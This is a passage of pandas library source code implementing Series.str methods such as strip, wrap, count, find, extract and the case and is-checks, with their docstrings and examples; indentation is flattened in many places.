            return codec(x, errors)[0]

    arr = self._data.array
    # assert isinstance(arr, (StringArray,))
    return self._wrap_result(arr._str_map(_decode_one))
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
"""
Encode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.encode`.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
encoded : Series/Index of objects
"""
result = self._data.array._str_encode(encoding, errors)
return self._wrap_result(result, returns_string=False)
# Shared docstring template for ``strip``/``lstrip``/``rstrip``; the
# %(position)s, %(side)s and %(method)s placeholders are substituted via
# ``@Appender`` on each method below.  The text itself is runtime data.
_shared_docs[
    "str_strip"
] = r"""
Remove %(position)s characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series or Index of object
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
    _shared_docs["str_strip"]
    % {
        "side": "left and right sides",
        "method": "strip",
        "position": "leading and trailing",
    }
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
    # Strip from both ends; None means whitespace (including newlines).
    return self._wrap_result(self._data.array._str_strip(to_strip))
@Appender(
    _shared_docs["str_strip"]
    % {"side": "left side", "method": "lstrip", "position": "leading"}
)
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
    # Strip from the left end only.
    return self._wrap_result(self._data.array._str_lstrip(to_strip))
@Appender(
    _shared_docs["str_strip"]
    % {"side": "right side", "method": "rstrip", "position": "trailing"}
)
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
    # Strip from the right end only.
    return self._wrap_result(self._data.array._str_rstrip(to_strip))
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
r"""
Wrap strings in Series/Index at specified line width.
This method has the same keyword parameters and defaults as
:class:`textwrap.TextWrapper`.
Parameters
----------
width : int
Maximum line width.
expand_tabs : bool, optional
If True, tab characters will be expanded to spaces (default: True).
replace_whitespace : bool, optional
If True, each whitespace character (as defined by string.whitespace)
remaining after tab expansion will be replaced by a single space
(default: True).
drop_whitespace : bool, optional
If True, whitespace that, after wrapping, happens to end up at the
beginning or end of a line is dropped (default: True).
break_long_words : bool, optional
If True, then words longer than width will be broken in order to ensure
that no lines are longer than width. If it is false, long words will
not be broken, and some lines may be longer than width (default: True).
break_on_hyphens : bool, optional
If True, wrapping will occur preferably on whitespace and right after
hyphens in compound words, as it is customary in English. If false,
only whitespaces will be considered as potentially good places for line
breaks, but you need to set break_long_words to false if you want truly
insecable words (default: True).
Returns
-------
Series or Index
Notes
-----
Internally, this method uses a :class:`textwrap.TextWrapper` instance with
default settings. To achieve behavior matching R's stringr library str_wrap
function, use the arguments:
- expand_tabs = False
- replace_whitespace = True
- drop_whitespace = True
- break_long_words = False
- break_on_hyphens = False
Examples
--------
>>> s = pd.Series(['line to be wrapped', 'another line to be wrapped'])
>>> s.str.wrap(12)
0 line to be\nwrapped
1 another line\nto be\nwrapped
dtype: object
"""
result = self._data.array._str_wrap(width, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
"""
Return DataFrame of dummy/indicator variables for Series.
Each string in Series is split by sep and returned as a DataFrame
of dummy/indicator variables.
Parameters
----------
sep : str, default "|"
String to split on.
Returns
-------
DataFrame
Dummy variables corresponding to values of the Series.
See Also
--------
get_dummies : Convert categorical variable into dummy/indicator
variables.
Examples
--------
>>> pd.Series(['a|b', 'a', 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 1 0 0
2 1 0 1
>>> pd.Series(['a|b', np.nan, 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 0 0 0
2 1 0 1
"""
# we need to cast to Series of strings as only that has all
# methods available for making the dummies...
result, name = self._data.array._str_get_dummies(sep)
return self._wrap_result(
result,
name=name,
expand=True,
returns_string=False,
)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
"""
Map all characters in the string through the given mapping table.
Equivalent to standard :meth:`str.translate`.
Parameters
----------
table : dict
Table is a mapping of Unicode ordinals to Unicode ordinals, strings, or
None. Unmapped characters are left untouched.
Characters mapped to None are deleted. :meth:`str.maketrans` is a
helper function for making translation tables.
Returns
-------
Series or Index
"""
result = self._data.array._str_translate(table)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def count(self, pat, flags=0):
r"""
Count occurrences of pattern in each string of the Series/Index.
This function is used to count the number of times a particular regex
pattern is repeated in each of the string elements of the
:class:`~pandas.Series`.
Parameters
----------
pat : str
Valid regular expression.
flags : int, default 0, meaning no flags
Flags for the `re` module. For a complete list, `see here
<https://docs.python.org/3/howto/regex.html#compilation-flags>`_.
**kwargs
For compatibility with other string methods. Not used.
Returns
-------
Series or Index
Same type as the calling object containing the integer counts.
See Also
--------
re : Standard library module for regular expressions.
str.count : Standard library version, without regular expression support.
Notes
-----
Some characters need to be escaped when passing in `pat`.
eg. ``'$'`` has a special meaning in regex and must be escaped when
finding this literal character.
Examples
--------
>>> s = pd.Series(['A', 'B', 'Aaba', 'Baca', np.nan, 'CABA', 'cat'])
>>> s.str.count('a')
0 0.0
1 0.0
2 2.0
3 2.0
4 NaN
5 0.0
6 1.0
dtype: float64
Escape ``'$'`` to find the literal dollar sign.
>>> s = pd.Series(['$', 'B', 'Aab$', '$$ca', 'C$B$', 'cat'])
>>> s.str.count('\\$')
0 1
1 0
2 1
3 2
4 2
5 0
dtype: int64
This is also available on Index
>>> pd.Index(['A', 'A', 'Aaba', 'cat']).str.count('a')
Int64Index([0, 0, 2, 1], dtype='int64')
"""
result = self._data.array._str_count(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def startswith(self, pat, na=None):
"""
Test if the start of each string element matches a pattern.
Equivalent to :meth:`str.startswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string. The default depends
on dtype of the array. For object-dtype, ``numpy.nan`` is used.
For ``StringDtype``, ``pandas.NA`` is used.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the start of each string element.
See Also
--------
str.startswith : Python standard library string method.
Series.str.endswith : Same as startswith, but tests the end of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'Bear', 'cat', np.nan])
>>> s
0 bat
1 Bear
2 cat
3 NaN
dtype: object
>>> s.str.startswith('b')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.startswith('b', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
result = self._data.array._str_startswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def endswith(self, pat, na=None):
"""
Test if the end of each string element matches a pattern.
Equivalent to :meth:`str.endswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string. The default depends
on dtype of the array. For object-dtype, ``numpy.nan`` is used.
For ``StringDtype``, ``pandas.NA`` is used.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the end of each string element.
See Also
--------
str.endswith : Python standard library string method.
Series.str.startswith : Same as endswith, but tests the start of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'bear', 'caT', np.nan])
>>> s
0 bat
1 bear
2 caT
3 NaN
dtype: object
>>> s.str.endswith('t')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.endswith('t', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
result = self._data.array._str_endswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def findall(self, pat, flags=0):
"""
Find all occurrences of pattern or regular expression in the Series/Index.
Equivalent to applying :func:`re.findall` to all the elements in the
Series/Index.
Parameters
----------
pat : str
Pattern or regular expression.
flags : int, default 0
Flags from ``re`` module, e.g. `re.IGNORECASE` (default is 0, which
means no flags).
Returns
-------
Series/Index of lists of strings
All non-overlapping matches of pattern or regular expression in each
string of this Series/Index.
See Also
--------
count : Count occurrences of pattern or regular expression in each string
of the Series/Index.
extractall : For each string in the Series, extract groups from all matches
of regular expression and return a DataFrame with one row for each
match and one column for each group.
re.findall : The equivalent ``re`` function to all non-overlapping matches
of pattern or regular expression in string, as a list of strings.
Examples
--------
>>> s = pd.Series(['Lion', 'Monkey', 'Rabbit'])
The search for the pattern 'Monkey' returns one match:
>>> s.str.findall('Monkey')
0 []
1 [Monkey]
2 []
dtype: object
On the other hand, the search for the pattern 'MONKEY' doesn't return any
match:
>>> s.str.findall('MONKEY')
0 []
1 []
2 []
dtype: object
Flags can be added to the pattern or regular expression. For instance,
to find the pattern 'MONKEY' ignoring the case:
>>> import re
>>> s.str.findall('MONKEY', flags=re.IGNORECASE)
0 []
1 [Monkey]
2 []
dtype: object
When the pattern matches more than one string in the Series, all matches
are returned:
>>> s.str.findall('on')
0 [on]
1 [on]
2 []
dtype: object
Regular expressions are supported too. For instance, the search for all the
strings ending with the word 'on' is shown next:
>>> s.str.findall('on$')
0 [on]
1 []
2 []
dtype: object
If the pattern is found more than once in the same string, then a list of
multiple strings is returned:
>>> s.str.findall('b')
0 []
1 []
2 [b, b]
dtype: object
"""
result = self._data.array._str_findall(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
r"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the
first match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
Flags from the ``re`` module, e.g. ``re.IGNORECASE``, that
modify regular expression matching for things like case,
spaces, etc. For more details, see :mod:`re`.
expand : bool, default True
If True, return DataFrame with one column per capture group.
If False, return a Series/Index if there is one capture group
or DataFrame if there are multiple capture groups.
Returns
-------
DataFrame or Series or Index
A DataFrame with one row for each subject string, and one
column for each group. Any capture group names in regular
expression pat will be used for column names; otherwise
capture group numbers will be used. The dtype of each result
column is always object, even when no match is found. If
``expand=False`` and pat has only one capture group, then
return a Series (if subject is a Series) or Index (if subject
is an Index).
See Also
--------
extractall : Returns all matches (not just the first match).
Examples
--------
A pattern with two groups will return a DataFrame with two columns.
Non-matches will be NaN.
>>> s = pd.Series(['a1', 'b2', 'c3'])
>>> s.str.extract(r'([ab])(\d)')
0 1
0 a 1
1 b 2
2 NaN NaN
A pattern may contain optional groups.
>>> s.str.extract(r'([ab])?(\d)')
0 1
0 a 1
1 b 2
2 NaN 3
Named groups will become column names in the result.
>>> s.str.extract(r'(?P<letter>[ab])(?P<digit>\d)')
letter digit
0 a 1
1 b 2
2 NaN NaN
A pattern with one group will return a DataFrame with one column
if expand=True.
>>> s.str.extract(r'[ab](\d)', expand=True)
0
0 1
1 2
2 NaN
A pattern with one group will return a Series if expand=False.
>>> s.str.extract(r'[ab](\d)', expand=False)
0 1
1 2
2 NaN
dtype: object
"""
# TODO: dispatch
return str_extract(self, pat, flags, expand=expand)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
r"""
Extract capture groups in the regex `pat` as columns in DataFrame.
For each subject string in the Series, extract groups from all
matches of regular expression pat. When each subject string in the
Series has exactly one match, extractall(pat).xs(0, level='match')
is the same as extract(pat).
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
A ``re`` module flag, for example ``re.IGNORECASE``. These allow
to modify regular expression matching for things like case, spaces,
etc. Multiple flags can be combined with the bitwise OR operator,
for example ``re.IGNORECASE | re.MULTILINE``.
Returns
-------
DataFrame
A ``DataFrame`` with one row for each match, and one column for each
group. Its rows have a ``MultiIndex`` with first levels that come from
the subject ``Series``. The last level is named 'match' and indexes the
matches in each item of the ``Series``. Any capture group names in
regular expression pat will be used for column names; otherwise capture
group numbers will be used.
See Also
--------
extract : Returns first match only (not all matches).
Examples
--------
A pattern with one group will return a DataFrame with one column.
Indices with no matches will not appear in the result.
>>> s = pd.Series(["a1a2", "b1", "c1"], index=["A", "B", "C"])
>>> s.str.extractall(r"[ab](\d)")
0
match
A 0 1
1 2
B 0 1
Capture group names are used for column names of the result.
>>> s.str.extractall(r"[ab](?P<digit>\d)")
digit
match
A 0 1
1 2
B 0 1
A pattern with two groups will return a DataFrame with two columns.
>>> s.str.extractall(r"(?P<letter>[ab])(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
Optional groups that do not match are NaN in the result.
>>> s.str.extractall(r"(?P<letter>[ab])?(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
C 0 NaN 1
"""
# TODO: dispatch
return str_extractall(self._orig, pat, flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index.
Each of returned indexes corresponds to the position where the
substring is fully contained between [start:end]. Return -1 on
failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of int.
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% {
"side": "lowest",
"method": "find",
"also": "rfind : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_find(sub, start, end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["find"]
% {
"side": "highest",
"method": "rfind",
"also": "find : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rfind(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
"""
Return the Unicode normal form for the strings in the Series/Index.
For more information on the forms, see the
:func:`unicodedata.normalize`.
Parameters
----------
form : {'NFC', 'NFKC', 'NFD', 'NFKD'}
Unicode form.
Returns
-------
normalized : Series/Index of objects
"""
result = self._data.array._str_normalize(form)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each string in Series/Index.
Each of the returned indexes corresponds to the position where the
substring is fully contained between [start:end]. This is the same
as ``str.%(similar)s`` except instead of returning -1, it raises a
ValueError when the substring is not found. Equivalent to standard
``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of object
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% {
"side": "lowest",
"similar": "find",
"method": "index",
"also": "rindex : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_index(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["index"]
% {
"side": "highest",
"similar": "rfind",
"method": "rindex",
"also": "index : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rindex(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
def len(self):
"""
Compute the length of each element in the Series/Index.
The element may be a sequence (such as a string, tuple or list) or a collection
(such as a dictionary).
Returns
-------
Series or Index of int
A Series or Index of integer values indicating the length of each
element in the Series or Index.
See Also
--------
str.len : Python built-in function returning the length of an object.
Series.size : Returns the length of the Series.
Examples
--------
Returns the length (number of characters) in a string. Returns the
number of entries for dictionaries, lists or tuples.
>>> s = pd.Series(['dog',
... '',
... 5,
... {'foo' : 'bar'},
... [2, 3, 5, 7],
... ('one', 'two', 'three')])
>>> s
0 dog
1
2 5
3 {'foo': 'bar'}
4 [2, 3, 5, 7]
5 (one, two, three)
dtype: object
>>> s.str.len()
0 3.0
1 0.0
2 NaN
3 1.0
4 4.0
5 3.0
dtype: float64
"""
result = self._data.array._str_len()
return self._wrap_result(result, returns_string=False)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series or Index of object
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
Series.str.casefold: Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
# Types:
# cases:
# upper, lower, title, capitalize, swapcase, casefold
# boolean:
# isalpha, isnumeric isalnum isdigit isdecimal isspace islower isupper istitle
# _doc_args holds dict of strings to use in substituting casemethod docs
_doc_args: Dict[str, Dict[str, str]] = {}
_doc_args["lower"] = {"type": "lowercase", "method": "lower", "version": ""}
_doc_args["upper"] = {"type": "uppercase", "method": "upper", "version": ""}
_doc_args["title"] = {"type": "titlecase", "method": "title", "version": ""}
_doc_args["capitalize"] = {
"type": "be capitalized",
"method": "capitalize",
"version": "",
}
_doc_args["swapcase"] = {
"type": "be swapcased",
"method": "swapcase",
"version": "",
}
_doc_args["casefold"] = {
"type": "be casefolded",
"method": "casefold",
"version": "\n .. versionadded:: 0.25.0\n",
}
@Appender(_shared_docs["casemethods"] % _doc_args["lower"])
@forbid_nonstring_types(["bytes"])
def lower(self):
result = self._data.array._str_lower()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["upper"])
@forbid_nonstring_types(["bytes"])
def upper(self):
result = self._data.array._str_upper()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["title"])
@forbid_nonstring_types(["bytes"])
def title(self):
result = self._data.array._str_title()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["capitalize"])
@forbid_nonstring_types(["bytes"])
def capitalize(self):
result = self._data.array._str_capitalize()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["swapcase"])
@forbid_nonstring_types(["bytes"])
def swapcase(self):
result = self._data.array._str_swapcase()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["casefold"])
@forbid_nonstring_types(["bytes"])
def casefold(self):
result = self._data.array._str_casefold()
return self._wrap_result(result)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
assumed to be as any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = {"type": "alphanumeric", "method": "isalnum"}
_doc_args["isalpha"] = {"type": "alphabetic", "method": "isalpha"}
_doc_args["isdigit"] = {"type": "digits", "method": "isdigit"}
_doc_args["isspace"] = {"type": "whitespace", "method": "isspace"}
_doc_args["islower"] = {"type": "lowercase", "method": "islower"}
_doc_args["isupper"] = {"type": "uppercase", "method": "isupper"}
_doc_args["istitle"] = {"type": "titlecase", "method": "istitle"}
_doc_args["isnumeric"] = {"type": "numeric", "method": "isnumeric"}
_doc_args["isdecimal"] = {"type": "decimal", "method": "isdecimal"}
# force _noarg_wrapper return type with dtype=np.dtype(bool) (GH 29624)
isalnum = _map_and_wrap(
"isalnum", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
isalpha = _map_and_wrap(
"isalpha", docstring=_shared_docs["ismethods"] % _doc_args["isalpha"]
)
isdigit = _map_and_wrap(
"isdigit", docstring=_shared_docs["ismethods"] % _doc_args["isdigit"]
)
isspace = _map_and_wrap(
"isspace", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
islower = _map_and_wrap(
"islower", docstring=_shared_docs["ismethods"] % _doc_args["islower"]
)
isupper = _map_and_wrap(
"isupper", docstring=_shared_docs["ismethods"] % _doc_args["isupper"]
)
istitle = _map_and_wrap(
"istitle", docstring=_shared_docs["ismethods"] % _doc_args["istitle"]
)
isnumeric = _map_and_wrap(
"isnumeric", docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"]
)
isdecimal = _map_and_wrap(
"isdecimal", docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"]
)
def cat_safe(list_of_columns: List, sep: str):
    """
    Auxiliary function for :meth:`str.cat`.

    Same signature as cat_core, but handles TypeErrors in concatenation, which
    happen if the arrays in list_of_columns have the wrong dtypes or content.

    Parameters
    ----------
    list_of_columns : list of numpy arrays
        List of arrays to be concatenated with sep;
        these arrays may not contain NaNs!
    sep : string
        The separator string for concatenating the columns.

    Returns
    -------
    nd.array
        The concatenation of list_of_columns with sep.

    Raises
    ------
    TypeError
        If a column contains non-string (and non-missing) values, or if
        concatenation fails for another reason.
    """
    try:
        result = cat_core(list_of_columns, sep)
    except TypeError:
        # if there are any non-string values (wrong dtype or hidden behind
        # object dtype), np.sum will fail; catch and return with better message
        for column in list_of_columns:
            dtype = lib.infer_dtype(column, skipna=True)
            if dtype not in ["string", "empty"]:
                raise TypeError(
                    "Concatenation requires list-likes containing only "
                    "strings (or missing values). Offending values found in "
                    f"column {dtype}"
                ) from None
        # BUG FIX: no offending column was identified — re-raise the original
        # TypeError instead of falling through to `return result`, which
        # would raise a confusing UnboundLocalError.
        raise
    return result
def cat_core(list_of_columns: List, sep: str):
    """
    Auxiliary function for :meth:`str.cat`.

    Parameters
    ----------
    list_of_columns : list of numpy arrays
        List of arrays to be concatenated with sep;
        these arrays may not contain NaNs!
    sep : string
        The separator string for concatenating the columns.

    Returns
    -------
    nd.array
        The concatenation of list_of_columns with sep.
    """
    if sep == "":
        # Fast path: nothing to interleave, just elementwise-"sum" (string
        # concatenation on object dtype) down the columns.
        return np.sum(np.asarray(list_of_columns, dtype=object), axis=0)
    # Interleave the separator between the columns:
    # [col0, sep, col1, sep, ..., colN] — sep broadcasts across each row.
    interleaved = [sep] * (2 * len(list_of_columns) - 1)
    interleaved[::2] = list_of_columns
    return np.sum(np.asarray(interleaved, dtype=object), axis=0)
def _groups_or_na_fun(regex):
"""Used in both extract_noexpand and extract_frame"""
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _result_dtype(arr):
    # workaround #27953
    # ideally we just pass `dtype=arr.dtype` unconditionally, but this fails
    # when the list of values is empty.
    from pandas.core.arrays.string_ import StringDtype
    from pandas.core.arrays.string_arrow import ArrowStringDtype

    # String-backed arrays keep their (named) string dtype; everything else
    # falls back to plain object.
    string_dtypes = (StringDtype, ArrowStringDtype)
    return arr.dtype.name if isinstance(arr.dtype, string_dtypes) else object
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _str_extract_noexpand(arr, pat, flags=0):
    """
    Find groups in each string in the Series using passed regular
    expression. This function is called from
    str_extract(expand=False), and can return Series, DataFrame, or
    Index.
    """
    from pandas import (
        DataFrame,
        array as pd_array,
    )
    regex = re.compile(pat, flags=flags)
    groups_or_na = _groups_or_na_fun(regex)
    result_dtype = _result_dtype(arr)
    if regex.groups == 1:
        # Single capture group: flatten to a 1-D array; if the group is
        # named, that name becomes the result's name.
        result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
        name = _get_single_group_name(regex)
        # not dispatching, so we have to reconstruct here.
        result = pd_array(result, dtype=result_dtype)
    else:
        # Multiple groups: only possible for Series input (an Index cannot
        # hold a 2-D result).
        if isinstance(arr, ABCIndex):
            raise ValueError("only one regex group is supported with Index")
        name = None
        # Invert groupindex (name -> number) so named groups label columns;
        # unnamed groups fall back to their zero-based position.
        names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
        columns = [names.get(1 + i, i) for i in range(regex.groups)]
        if arr.size == 0:
            # Empty input: emit an empty frame with the right columns.
            # error: Incompatible types in assignment (expression has type
            # "DataFrame", variable has type "ndarray")
            result = DataFrame(  # type: ignore[assignment]
                columns=columns, dtype=object
            )
        else:
            dtype = _result_dtype(arr)
            # error: Incompatible types in assignment (expression has type
            # "DataFrame", variable has type "ndarray")
            result = DataFrame(  # type:ignore[assignment]
                [groups_or_na(val) for val in arr],
                columns=columns,
                index=arr.index,
                dtype=dtype,
            )
    return result, name
def _str_extract_frame(arr, pat, flags=0):
    """
    For each subject string in the Series, extract groups from the
    first match of regular expression pat. This function is called from
    str_extract(expand=True), and always returns a DataFrame.
    """
    from pandas import DataFrame

    regex = re.compile(pat, flags=flags)
    groups_or_na = _groups_or_na_fun(regex)
    # Label columns with group names where available; unnamed groups use
    # their zero-based position.
    group_names = {num: name for name, num in regex.groupindex.items()}
    columns = [group_names.get(i + 1, i) for i in range(regex.groups)]
    if len(arr) == 0:
        return DataFrame(columns=columns, dtype=object)
    result_index = getattr(arr, "index", None)
    return DataFrame(
        [groups_or_na(val) for val in arr],
        columns=columns,
        index=result_index,
        dtype=_result_dtype(arr),
    )
def str_extract(arr, pat, flags=0, expand=True):
    """Dispatch ``.str.extract`` to the expand / no-expand implementations."""
    if not isinstance(expand, bool):
        raise ValueError("expand must be True or False")
    if expand:
        frame = _str_extract_frame(arr._orig, pat, flags=flags)
        return frame.__finalize__(arr._orig, method="str_extract")
    result, name = _str_extract_noexpand(arr._orig, pat, flags=flags)
    return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
    """
    Extract capture groups from all matches of `pat` in each element of
    `arr`, returning one row per match indexed by a MultiIndex whose last
    level is named 'match'.
    """
    regex = re.compile(pat, flags=flags)
    # the regex must contain capture groups.
    if regex.groups == 0:
        raise ValueError("pattern contains no capture groups")
